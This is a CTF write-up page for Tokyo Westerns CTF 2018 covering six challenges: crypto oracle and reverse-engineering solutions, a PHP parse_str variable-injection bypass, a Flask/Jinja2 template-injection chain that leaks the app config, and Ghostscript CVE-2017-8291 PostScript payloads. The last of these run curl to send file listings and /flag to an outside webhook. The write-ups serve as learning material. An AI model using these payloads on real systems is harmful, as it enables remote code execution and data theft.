[Go back](..)

# Tokyo Westerns CTF 2018 writeups

### Welcome!! (28): Misc

#### Proof of Flag
```
TWCTF{Welcome_TokyoWesterns_CTF_2018!!}
```

#### Summary
The flag is in the task description.





### scs7 (112): Crypto

#### Proof of Flag
```
TWCTF{67ced5346146c105075443add26fd7efd72763dd}
```

#### Summary
Base59 with a shuffled alphabet. We can figure out the alphabet by sending it
bytes from 59 to 117, observing the last encrypted character, and then using the
observed alphabet to decrypt the flag.

#### Proof of solving
I initially tried sending `TWCTF{` + each character and seeing which one would
match the largest prefix. The problem with that is that as they use base59, the
symbol boundaries don't really line up with encodings with power-of-two symbols
so I got many false positives and false negatives.

Here’s the successful solution:

I tried sending all characters from 0 to 99 and seeing the result:

```py
from pwn import *

def request(plaintext):
    r.recvuntil("message: ")
    r.sendline(plaintext)
    r.recvuntil("ciphertext: ")
    return r.recvline()[:-1]

r = remote("crypto.chal.ctf.westerns.tokyo", 14791)
requestcount = 0
r.recvuntil("encrypted flag: ")
encflag = r.recvline().strip()
print("Target flag: \n" + encflag)

for i in range(0, 256):
    print(i, request(chr(i)))
```


And that made the encryption algorithm obvious. Here's an example output of that
program:

```
Target flag:
0KhpGLHUSc3D7B449JsxM4L7etCnYW9HH5jBpo72kPgrgXeWzbKxbhyrkN29gb64
(0, '')
(1, 'S')
(2, 'm')
(3, 'h')
...
(38, 'x')
(39, 'f')
(40, 'E')
...
(57, 's')
(58, '6')
(59, 't')
(60, 'ST')
(61, 'SS')
(62, 'Sm')
(63, 'Sh')
...
(97, 'Sx')
(98, 'Sf')
(99, 'SE')
```

It is clear that the last letter repeats every 59 values. We could call this a
base 59 encoding, but the symbols are not in alphabetical order so the output
changes every time. It's safe to assume that the alphabet is shuffled for every
connection.

In this case we only need to observe 59 encryptions to reconstruct the alphabet
and decrypt the flag:

```py
from pwn import *

r = remote("crypto.chal.ctf.westerns.tokyo", 14791)
r.recvuntil("encrypted flag: ")
encflag = r.recvline().strip()
print("Target flag: \n" + encflag)

alphabet = ["?"] * 59

for i in range(60, 60+59):
    r.recvuntil("message: ")
    r.sendline(chr(i))
    r.recvuntil("ciphertext: ")
    ct = r.recvline().strip()
    alphabet[i % 59] = ct[-1]
    print(i-60)    # to know the progress

plaintext_num = 0
for c in encflag:
    plaintext_num = plaintext_num * 59 + alphabet.index(c)

print(hex(plaintext_num))

# => 0x54574354467b363763656435333436313436633130353037353434336164643236666437656664373237363364647d
# => TWCTF{67ced5346146c105075443add26fd7efd72763dd}
```






### dec dec dec (99): Crypto/Reverse

#### Proof of Flag
```
TWCTF{base64_rot13_uu}
```

#### Summary
The program base64encodes input, rot13 that, then base64encodes the rot13 result
using an unusual alphabet: characters 32 (space) to 96 (backtick). At the end it
checks if the result equals `@25-Q44E233=,>E-M34=,,$LS5VEQ45)M2S-),7-$/3T `.

#### Proof of solving
Pardon the dumbed down explanation, I'm going to use this to explain reverse
engineering to some “newbies” later this month/year.

I opened the binary in IDA and located the main function:

![screenshot of first branch](./dec/dec1.jpg)

The left branch (blue #2) prints some usage information and is being jumped to
if `var_14` is not equal to 2 (green #1). It's safe to assume then that `var_14`
is `argc`.

The purple #3 instructions load the value in `var_20`, add 8 to it and use that
as a pointer. Then it passes that pointer to `strlen`, so it should be a string.
`var_20` is the `argv` array of string pointers to the command line arguments.
8 is added to the array address to access the second element because each
element is a memory address and on 64bit addresses take 8 bytes.

##### main()
Let's take a look at the next portion of main:

![screenshot of the rest of main()](./dec/dec2.jpg)

The first three instructions are the ones I talked about in the last part. They
load `argv[1]` into `rax`. After that `strlen` is called to get the length of
the argument, then that is incremented and passed to `malloc` to generate a
region of memory that will fit a copy of the string (plus one for the null
terminator). Then we call strlen again to recalculate the length of argv\[1] (it
hasn't changed; this is redundant) and use `strncpy` to copy that many bytes
from the argument to this new memory region.

After the `strncpy` call the copied string is passed through three functions
that change it. In the end the modified string will be compared with a string at
address `cs:s2`. That final correct string is:

`@25-Q44E233=,>E-M34=,,$LS5VEQ45)M2S-),7-$/3T `

##### First function
Let's take a look at the first function! It's pretty long, but we don't really
need to analyse at all of it. We can just take a brief look. Here are some
important snippets. The first looks like the hex encoding of some ASCII letters,
so I converted them to characters:

![hex strings](./dec/dec3.jpg)
![ABCDEF...XYZ alphabet](./dec/dec4.png)

The array this is initialising looks like the usual base64 alphabet. If we look
further we can see two branches - one which adds an equal sign to some string
and one which adds two equal signs to that string. That's just like the standard
base64 padding:

!['=' and '==' logic](./dec/dec5.png)

The last important thing to notice in this function is that at the beginning it
`malloc()`s the destination string and puts the returned address in `var_58` and
then at the end it returns that address (through the `rax` register):

![var_58 = malloc(...)](./dec/dec6.png)
![rax = var_58](./dec/dec7.png)

##### Second function
This one is considerably shorter. It also `malloc()`s a new buffer and returns
it. Then it loops through the input string. For each character, if it's not a
letter it just writes it as-is to the new buffer. For letters there are two
branches that handle lowercase and uppercase.

![second function logic](./dec/dec8.jpg)

The green arrows show the fetching of a character from the input string.

The execution follows blue arrow 1 if the character is greater than 0x40 = 64 =
'A'-1. After that if it's also less than or equal to 0x5A = 90 = 'Z' arrow 3 is
followed and we end up in block A (uppercase letters). However, if either arrow
1 or arrow 3 isn't taken then arrow 2 or arrow 4 will be followed. We know that
the current character is not an uppercase letter. If it's greater than 0x60 =
'a'-1 (arrow 5) and less than 0x7a = 'z' (arrow 7) we enter block B which
handles lowercase letters. If we don't take that route we'll end up following
either arrow 6 or 8 and that takes us to block C which handles non-letter
characters.

The easiest one to understand is block C which just copies the source character
unmodified.

The other two blocks do some weird arithmetic (red question marks) on the input
character. They first subtract '4' or 'T', which basically gets the alphabet
index of the character plus 13. I didn't understand the operations so I searched
for the 0x4ec4ec4f constant and found this:

http://www.flounder.com/multiplicative_inverse.htm

It seems like “the mystery code” is dividing the value by 26, then multiplying
the rounded down result by 26 and subtracting that from the initial value.
That's an interesting way to calculate the number modulo 26.

Hmmmm... it first calculates the index of the character in the alphabet plus 13,
then calculates that mod 26, then puts the corresponding letter in the output
string. That's ROT13!

Now that we've figured out the first function is base64 encoding and the second
one is ROT13, let's take a look at the last:

##### The third function
This one took a while to figure what it does and I'm not going to go into a huge
amount of detail here, unfortunately :( (I'm running out of time).

I recognized this was an algorithm similar to base64 firstly because of the
`malloc` size. It allocates `initial_size*4/3` bytes and that's typical of
base64.

Another reason is the usage of the bitwise operations which are commonly also
used in base64 encoding. If we have an input block `char A[3]` which will be
encoded to the output block `char B[4]`, the following operations will be done:

```c
/* (1) */ B[0] = alphabet[A[0] >> 2];
/* (2) */ B[1] = alphabet[((A[0] << 6) & 0x30) | (A[1] >> 4)];
/* (3) */ B[2] = alphabet[((A[1] << 4) & 0x3C) | (A[2] >> 6)];
/* (4) */ B[3] = alphabet[A[2] & 63];
```

We can see quite similar operations inside the function:

![many instructions similar to #1 and #3 from above](./dec/dec9.jpg)

So indeed it seems like base64 encryption but instead of using the standard
"ABCD..XYZabc...xyz0123..89/+" alphabet it uses characters starting at ascii
index 0x20 - the space character.

One annoying thing it does is prepending an @ character and if we don't look out
for that it won't decode properly. I'll just ignore that character.

##### Reversing the final string

```py
targetString = "@25-Q44E233=,>E-M34=,,$LS5VEQ45)M2S-),7-$/3T "
```

The first thing to do would be to base64 decode using the special alphabet:

```py
decodedBits = ""
for c in targetString[1:]:
    decodedBits += bin(ord(c) - ord(' ') + 64)[-6:]
decodedText = ""
for i in range(0, len(decodedBits), 8):
    decodedText += chr(int(decodedBits[i:i+8], 2))
print(decodedText) # => ISqQIRM7LzSmMGL0K3WiqQRmK3I1sD==
```

Now let's ROT13 that:

```py
rot13edText = ""
for c in decodedText:
    if ord(c) >= ord('a') and ord(c) <= ord('z'):
        rot13edText += chr((ord(c) - ord('a') + 13) % 26 + ord('a'))
    elif ord(c) >= ord('A') and ord(c) <= ord('Z'):
        rot13edText += chr((ord(c) - ord('A') + 13) % 26 + ord('A'))
    else:
        rot13edText += c
print(rot13edText) # => IFdQIRM7LmFzMGL0K3JvdQRzK3I1fD==
```

And finally, let's base64 decode that:

```py
from base64 import b64decode
print(b64decode(rot13edText))    # => TWCTF{base64_rot13_uu}
```





### SimpleAuth (55): Web

#### Proof of Flag
```
TWCTF{d0_n0t_use_parse_str_without_result_param}
```

#### Summary
`parse_str` abuse.

#### Proof of solving
Server code

```php
<?php

require_once 'flag.php';

if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['action'])){
        $action = $res['action'];
    }
}

if ($action === 'auth') {
    if (!empty($res['user'])) {
        $user = $res['user'];
    }
    if (!empty($res['pass'])) {
        $pass = $res['pass'];
    }

    if (!empty($user) && !empty($pass)) {
        $hashed_password = hash('md5', $user.$pass);
    }
    if (!empty($hashed_password) && $hashed_password === 'c019f6e5cd8aa0bbbcc6e994a54c757e') {
        echo $flag;
    }
    else {
        echo 'fail :(';
    }
}
else {
    highlight_file(__FILE__);
}
```

#### Solution
I initially tried cracking the hash and looking it up on rainbow tables but
nothing was found so I figured there's a smarter way, and there is. The PHP
function `parse_str` doesn't just return an array with the parsed data, it also
adds the parsed variables to the global scope. The solution is requesting the
page with the query string:

`?action=auth&hashed_password=c019f6e5cd8aa0bbbcc6e994a54c757e`

This way because user and pass are undefined the hash isn't recalculated and the
one used in the comparison is the one we provide.

http://simpleauth.chal.ctf.westerns.tokyo/?action=auth&hashed_password=c019f6e5cd8aa0bbbcc6e994a54c757e

```
=> TWCTF{d0_n0t_use_parse_str_without_result_param}
```




### Shrine (190): Web

#### Proof of Flag
```
TWCTF{pray_f0r_sacred_jinja2}
```

#### Summary
Traversing flask global context to find a reference to the app config and get the flag.

#### Proof of Solving
Server code:
```py
import flask
import os


app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist])+s
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)
```

This basically sends our input to the jinja template engine. We can send a
payload enclosed by double curly braces for it to be interpreted as python code.
The only problem is that we are not allowed to directly access the `config` and
`self` objects which would give us the flag immediately and we cannot use
parantheses, so no function calls.



##### Solution
My plan was to look through the objects we do have access to in order to find
some “reference chain” that will get us to the `config` object. The environment
is extremely bare, we don’t even have python builtins available, so our only
chance is accessing attributes of objects.

The two objects we can use are `g` - the global app context, and `request` - the
current request object.

I ended up using `g`. The main thing to notice here is that if I simply send
`{{ g }}` as a payload the output is `<flask.g of 'app'>`. This is important
because it means that the app name is visible to `g`, so most probably the whole
app object also is.

The documentation out there isn’t that good, so I had to “dive in” the flask
source code. The `g` object has the class `_AppCtxGlobals` and that is defined
over here:

https://github.com/pallets/flask/blob/master/flask/ctx.py

The `<flask.g of 'app'>` string is created by the `g.__repr__` method:

```py
   def __repr__(self):
        top = _app_ctx_stack.top
        if top is not None:
            return '<flask.g of %r>' % top.app.name
        return object.__repr__(self)
```

We can see that the method looks up the name in `_app_ctx_stack.top.app`. The
`_app_ctx_stack` variable isn’t exposed to us directly but there is a workaround
we can do to access it. Because the `__repr__` method is able to access
`_app_ctx_stack` it needs to have a reference to it in its object (everything is
an object in python, even functions and methods). Let’s take a look at what
attributes we can use from the method (they should be listed in the `__dict__`
attribute):

http://shrine.chal.ctf.westerns.tokyo/shrine/%7B%7B%20g.__repr__.__dict__%20%7D%7D

```
{}
```

Oh, there’s nothing there. We actually need to take a look at the method’s class
dict to see the attributes that all methods have:

http://shrine.chal.ctf.westerns.tokyo/shrine/%7B%7B%20g.__repr__.__class__.__dict__%20%7D%7D

```
{'__repr__': <slot wrapper '__repr__' of 'method' objects>, '__hash__': <slot
wrapper '__hash__' of 'method' objects>, '__call__': <slot wrapper '__call__' of
'method' objects>, '__getattribute__': <slot wrapper '__getattribute__' of
'method' objects>, '__setattr__': <slot wrapper '__setattr__' of 'method'
objects>, '__delattr__': <slot wrapper '__delattr__' of 'method' objects>,
'__lt__': <slot wrapper '__lt__' of 'method' objects>, '__le__': <slot wrapper
'__le__' of 'method' objects>, '__eq__': <slot wrapper '__eq__' of 'method'
objects>, '__ne__': <slot wrapper '__ne__' of 'method' objects>, '__gt__': <slot
wrapper '__gt__' of 'method' objects>, '__ge__': <slot wrapper '__ge__' of
'method' objects>, '__get__': <slot wrapper '__get__' of 'method' objects>,
'__new__': <built-in method __new__ of type object at 0x7fdc2b3c5ee0>,
'__reduce__': <method '__reduce__' of 'method' objects>,

!!! THIS !!!
'__func__': <member '__func__' of 'method' objects>,

'__self__': <member '__self__' of 'method' objects>, '__doc__': <attribute
'__doc__' of 'method' objects>}
```

The `__func__` attribute will give us the function that gets run by the method
(a method is a function plus a reference to the class it belongs, i think).
Let’s take a look at what we can do with `__func__`:

http://shrine.chal.ctf.westerns.tokyo/shrine/%7B%7B%20g.__repr__.__func__.__class__.__dict__%20%7D%7D

```
{'__repr__': <slot wrapper '__repr__' of 'function' objects>, '__call__': <slot
wrapper '__call__' of 'function' objects>, '__get__': <slot wrapper '__get__' of
'function' objects>, '__new__': <built-in method __new__ of type object at
0x5562fb698de0>, '__closure__': <member '__closure__' of 'function' objects>,
'__doc__': <member '__doc__' of 'function' objects>,

!!! THIS !!!
'__globals__': <member '__globals__' of 'function' objects>,

'__module__': <member '__module__' of 'function' objects>, '__code__':
<attribute '__code__' of 'function' objects>, '__defaults__': <attribute
'__defaults__' of 'function' objects>, '__kwdefaults__': <attribute
'__kwdefaults__' of 'function' objects>, '__annotations__': <attribute
'__annotations__' of 'function' objects>, '__dict__': <attribute '__dict__' of
'function' objects>, '__name__': <attribute '__name__' of 'function' objects>,
'__qualname__': <attribute '__qualname__' of 'function' objects>}
```

YESSS! We can get a list of the global variables used by the function with:

http://shrine.chal.ctf.westerns.tokyo/shrine/%7B%7B%20g.__repr__.__func__.__globals__%20%7D%7D

The output is quite large but here’s the bit we’re interested in:

```
{..., '_app_ctx_stack': <werkzeug.local.LocalStack object at 0x7fe74fc7f128>, ...}
```

We have access to `_app_ctx_stack`! This is awesome. We can now access
`_app_ctx_stack.top.app.config` to get the presumably “deleted” config object:

http://shrine.chal.ctf.westerns.tokyo/shrine/%7B%7B%20g.__repr__.__func__.__globals__._app_ctx_stack.top.app.config%20%7D%7D

At the end of the response we can see the flag:

```
... , 'FLAG': 'TWCTF{pray_f0r_sacred_jinja2}'}>
```





### Slack emoji converter (267): Web

#### Proof of Flag
```
TWCTF{watch_0ut_gh0stscr1pt_everywhere}
```

#### Summary
Exploiting an image upload form that doesn’t check the image type by sending it
postscript “images” which execute shell commands. See CVE-2017-8291.

#### Proof of solving
I’m omitting the server code here but what it does is save the image you send it
to a temporary file and attempting to resize it to max 128x128 pixels using the
python library Pillow. I initially thought it might be a race condition
vulnerability because of the `mktemp` usage. If you send the server a regular
image, say a png, jpeg, gif, etc. image, it works as expected and it sends you
back that image scaled down.

The problem is the fact that Pillow has postscript support and will try to
render a postscript “image” if sent one. I recently say this post on twitter and
it was exactly what I needed:

https://twitter.com/chaignc/status/1032253548954877954

I downloaded the server source and started a local instance to which I sent this
malicious postscript file:

```
%!PS
%%BoundingBox: 0 0 74 35

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%notify-send “PWNED BOIII”) currentdevice putdeviceprops
showpage
```

And this popped up:

![Notification with "PWNED BOIII" content](./emoji/notif.jpg)

This is awesome! We have RCE. To send a payload we only need to replace the
command in the postscript file to something else and send it again. I quickly
set up a https://webhook.site instance and crafted this payload:

```
%!PS
%%BoundingBox: 0 0 74 35

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl -X POST https://webhook.site/9ef35d63-cd74-42da-ad5c-7e1f57cd7395 -d "`ls -hal`") currentdevice putdeviceprops
showpage
```

After uploading it I received this request:

```
total 20K
drwxr-xr-x 1 root root 4.0K Sep  1 14:56 .
drwxr-xr-x 1 root root 4.0K Sep  1 14:38 ..
-rw-r--r-- 1 root root 1.1K Sep  1 14:25 app.py
drwxr-xr-x 2 root root 4.0K Sep  1 14:56 templates
-rw-r--r-- 1 root root  135 Sep  1 07:17 uwsgi.ini
```

This confirms we have RCE :D Exciting stuff! The flag wasn’t in the same
directory and it took a bit of looking around until I found where it is located.
It’s in the filesystem root directory. Here’s the listing of `/`:

```
total 76K
drwxr-xr-x   1 root root 4.0K Sep  2 07:03 .
drwxr-xr-x   1 root root 4.0K Sep  2 07:03 ..
-rwxr-xr-x   1 root root    0 Sep  2 07:03 .dockerenv
drwxr-xr-x   1 root root 4.0K Jul 17 03:15 bin
drwxr-xr-x   2 root root 4.0K Jun 26 12:03 boot
drwxr-xr-x   5 root root  360 Sep  2 07:03 dev
drwxr-xr-x   1 root root 4.0K Sep  2 07:03 etc
-rw-r--r--   1 root root   39 Sep  1 14:41 flag
drwxr-xr-x   2 root root 4.0K Jun 26 12:03 home
drwxr-xr-x   1 root root 4.0K Jul 17 03:15 lib
drwxr-xr-x   2 root root 4.0K Jul 16 00:00 lib64
drwxr-xr-x   2 root root 4.0K Jul 16 00:00 media
drwxr-xr-x   2 root root 4.0K Jul 16 00:00 mnt
drwxr-xr-x   2 root root 4.0K Jul 16 00:00 opt
dr-xr-xr-x 148 root root    0 Sep  2 07:03 proc
drwx------   1 root root 4.0K Sep  1 14:36 root
drwxr-xr-x   1 root root 4.0K Sep  2 07:03 run
drwxr-xr-x   1 root root 4.0K Jul 17 03:13 sbin
drwxr-xr-x   1 root root 4.0K Sep  1 14:38 srv
dr-xr-xr-x  12 root root    0 Sep  2 07:03 sys
drwxrwxrwt   1 root root 4.0K Sep  2 10:01 tmp
drwxr-xr-x   1 root root 4.0K Jul 16 00:00 usr
drwxr-xr-x   1 root root 4.0K Jul 16 00:00 var
```

Now let’s `cat /flag` with this final payload:

```
%!PS
%%BoundingBox: 0 0 74 35

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl -X POST https://webhook.site/9ef35d63-cd74-42da-ad5c-7e1f57cd7395 -d "`cat /flag`") currentdevice putdeviceprops
showpage
```

The received flag is:
```
TWCTF{watch_0ut_gh0stscr1pt_everywhere}
```
